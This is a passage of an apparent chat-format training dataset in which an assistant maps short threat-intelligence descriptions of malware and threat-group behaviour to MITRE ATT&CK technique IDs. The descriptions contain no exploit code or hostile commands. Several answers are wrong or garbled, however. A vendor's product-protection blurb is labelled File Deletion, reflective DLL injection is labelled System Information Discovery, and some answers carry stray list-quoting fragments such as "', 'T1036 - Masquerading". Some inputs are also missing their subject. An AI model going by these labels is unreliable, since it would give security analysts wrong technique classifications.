- "content": "Kinsing has attempted to brute force hosts over SSH."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 gathers information on network shares."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To create the scheduled task, the PowerShell payload starts by writing the following to a VBScript file with the same name as the task name (ex"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can uninstall itself."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used a variety of publicly available tools like Gpppassword to gather credentials."
- },
- {
- "role": "assistant",
- "content": "T1552.006 - Unsecured Credentials: Group Policy Preferences"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSInfo specifically looks for Domain Admins and power users within the domain."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used fake job advertisements sent via LinkedIn to spearphish victims."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one instance, APT29 created a Filter named BfeOnServiceStartTypeChange (Figure 1), which they configured to execute every Monday, Tuesday, Thursday, Friday, and Saturday at 11:33 am local time. Figure 1: “BfeOnServiceStartTypeChange” WMI Query Language (WQL) filter condition The BfeOnServiceStartTypeChange Filter was bound to the CommandLineEventConsumer WindowsParentalControlsMigration"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has a command called RunAs, which creates a new process as another user or process context."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used SQL injection for initial compromise."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The most common ports used are, 80, 1985, 1986, and 443. 1985 is the default port for the malware, 1986 is the lazy variation of that port. Port 80 and 443 are the default ports for HTTP and HTTPS traffic. The next most common is port 53. This is used in some of the newer 3.22 and 3.39 samples. After that, the count for each port starts declining sharply"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actors used the systeminfo command to look for details about the network configurations and settings and determine if the system was a VMware virtual machine. The threat actor used route print to display the entries in the local IP routing table."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware proceeds to check to see if the original dropped malware file exists. In the event it does, Reaver will move this file to ‘%TEMP%\\~FJIOW.tmp’ and delete this new file. This simply acts as cleanup to ensure original file artifacts no longer reside on the infected machine. Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges. Reaver continues to collect various information from the victim machine, including the following"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used COM scriptlets to download Cobalt Strike beacons."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Implant directory contained in the malicious Flash file"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "T1566.001: Spearphishing Attachment - T1566.002: Spearphishing Link - T1566.003: Spearphishing via Service - - - T1204.001: Malicious Link - T1204.002: Malicious File - T1059: Command and Scripting Interpreter T1059.005: Visual Basic - T1059.005: Visual Basic - - T1053.005: Scheduled Task - T1129: Shared Modules - T1106: Native API - T1047: Windows Management Instrumentation - - T1027: Obfuscated Files or Information T1027.002: Software Packing - T1027.002: Software Packing - T1553: Subvert Trust Controls T1553.002: Code Signing - T1553.002: Code Signing - T1218: Signed Binary Proxy Execution T1218.010: Regsvr32 - T1218.010: Regsvr32 - - T1497.001: System Checks - T1497.002: User Activity Based Checks - T1497.003: Time Based Evasion - T1112: Modify Registry - T1070: Indicator Removal on Host T1070.004: File Deletion - T1070.004: File Deletion - T1140: De-obfuscate/Decode Files or Information - - - T1090.003: Multi-hop Proxy - T1105: Ingress Tool Transfer - - T1055: Process Injection T1055.012: Process Hollowing - T1055.012: Process Hollowing - - T1082: System Information Discovery - T1049: System Network Connections Discovery - T1016: System Network Configuration Discovery - T1057: Process Discovery - T1033: System Owner/User Discovery - T1518: Software Discovery T1518.001: Security Software Discovery - T1518.001: Security Software Discovery - Persistence T1546: Event Triggered Execution T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1546: Event Triggered Execution - T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys / Startup Folder - T1547.001: Registry Run Keys / Startup Folder"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unlike a Docker engine that runs on a single host, a Kubernetes cluster typically contains more than one host and every host can run multiple containers. Given the abundant resources in a Kubernetes infrastructure, a hijacked Kubernetes cluster can be more profitable than a hijacked Docker host. This new TeamTNT malware campaign is one of the most complicated attacks targeting Kubernetes. This is also the most feature-rich malware we have seen from TeamTNT so far. In particular, the threat actor has developed more sophisticated tactics for initial access, execution, defense evasion and C2. Although the malware is still under development and the campaign is not yet widely spread, we believe the attacker will soon mature the tools and start a large-scale deployment"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value. This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system. The data structure used to transmit the agent_id to the C2 is as follows"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITTER has disguised malware as a Windows Security update service."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In all of the DropIt samples we collected, the dropper will then save the executable to the user’s %TEMP% folder and execute the file, specifically to one of the following filenames: %TEMP%\\spp.exe %TEMP%\\sloo.exe %TEMP%\\spoo.exe %TEMP%\\vschos.exe We have also seen Magic Hound using DropIt like a binder Trojan, specifically dropping a legitimate decoy executable along with the malicious executable as a payload"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XCSSET collects contacts and application data from files in Desktop, Documents, Downloads, Dropbox, and WeChat folders."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 can be used to automatically collect files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 sent several similar campaigns in mid-October with VBScript compressed in 7-Zip files that also downloaded either Locky or The Trick. By late October, the actor switched to Microsoft Word attachments that abused Dynamic Data Exchange (DDE) to download either Locky or Locky and The Trick in several more geo-targeted campaigns. This was the first time that we observed TA505 abusing DDE, a legitimate feature in Microsoft Office that became a regular part of multiple threat actors’ toolkits in Q4 2017. Recipients of these emails, which also used simple lures with attached fake invoices, needed to open the Microsoft Word attachments and click through a security dialog (Figure 3) to download the malware"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee’s system, they gained access to the e-commerce company's internal network. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. It isn't clear why the attackers scanned for hosts with port 40 open because there isn't a common protocol assigned to this port. Based on Suckfly scanning for common ports, it’s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"Uploader\" variant of visits a hard-coded server over HTTP/S to download the images uses to receive commands."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has injected code into trusted processes."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mimikatz's kerberos module can create golden tickets."
- },
- {
- "role": "assistant",
- "content": "T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Linux malware detection and prevention is not prevalent at this time, but Palo Alto Networks customers are protected through our next-generation security platform: IPS signature 14917 deployed to identify and prevent command and control activity The C2 domains and files mentioned in this report are blocked in our Threat Prevention product"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre can detect sandbox analysis environments by inspecting the process list and Registry."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke uses HTTP and HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINDSHIELD can gather the victim computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GOLD SOUTHFIELD has executed base64 encoded PowerShell scripts on compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A system info module in gathers information on the victim host’s configuration."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used WMI to execute scripts used for discovery."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "dropped and executed SecretsDump and CrackMapExec, tools that can dump password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 4: APT32 ActiveMime Lures Create Two Named Scheduled Tasks In this example, a scheduled task named “Windows Scheduled Maintenance” was created to run Casey Smith’s “Squiblydoo” App Whitelisting bypass every 30 minutes"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This code invokes time twice, with a sleep in between …then compares if the differences between the two calls to time match the amount of time that was system slept for. To detect sandboxes that patch (speedup) calls to sleep"
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used 7-Zip to archive data."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can obtain system information such as OS version and disk space."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The DUBNIUM samples are distributed in various ways, one instance was using a zero-day exploit that targets Adobe Flash, in December 2015"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can extract its agent from the body of a malicious document."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used various tools to steal files from the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq connects to a predefined domain on port 443 to exfil gathered information."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team added a login to a SQL Server with \"sp_addlinkedsrvlogin\"."
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Collects information about the infected system, network, drives, and installed applications. Saves the collected information to a file named “info” in “%appdata%\\Micorosoft\\Templates” and sends it to the C2"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used shell and VBS scripts as well as embedded macros for execution."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can execute an LDAP query to discover e-mail accounts for domain users."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has served fake updates via legitimate websites that have been compromised."
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae has created a service named \"Windows Update Agent1\" to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We believe this access was abused, for example, by inserting malicious scripts in the country’s official websites in order to conduct watering hole attacks"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper has used a delivered trojan to download additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has used tools such as NBTscan to enumerate network shares."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to enumerate system information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has placed scripts in the startup folder for persistence and modified the `HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce` Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The new domain names follow the same pattern as previously reported, except that they swap the top level domain name for another. We know that the threat actor has used the “.me” TLD in their past campaigns against some academic intuitions and this is still the case, along side “.tk” and “.cf"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A new registry entry is created at HKEY_CURRENT_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Graphics with a value of “C:\\ ProgramData \\ Initech \\Initech.exe” /run."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 used Outlook Credential Dumper to harvest credentials stored in Windows registry."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "yty communicates to the C2 server by retrieving a Google Doc."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The dropper installs the Bisonal EXE file and decoy PDF file. These files are not encrypted and the offset to the EXE and PDF file in the dropper is appended at the end of the dropper file. The file name of the decoy file is based on the dropper file name. The dropper code creates a PDF at the same directory, give the same name with itself to the decoy file, removes .exe and adds .pdf in the code. The dropper also creates two VBS scripts in the %Temp% directory with a random 4 digits hexadecimal name. The other deletes the dropper and the VBS script itself"
- },
- {
- "role": "assistant",
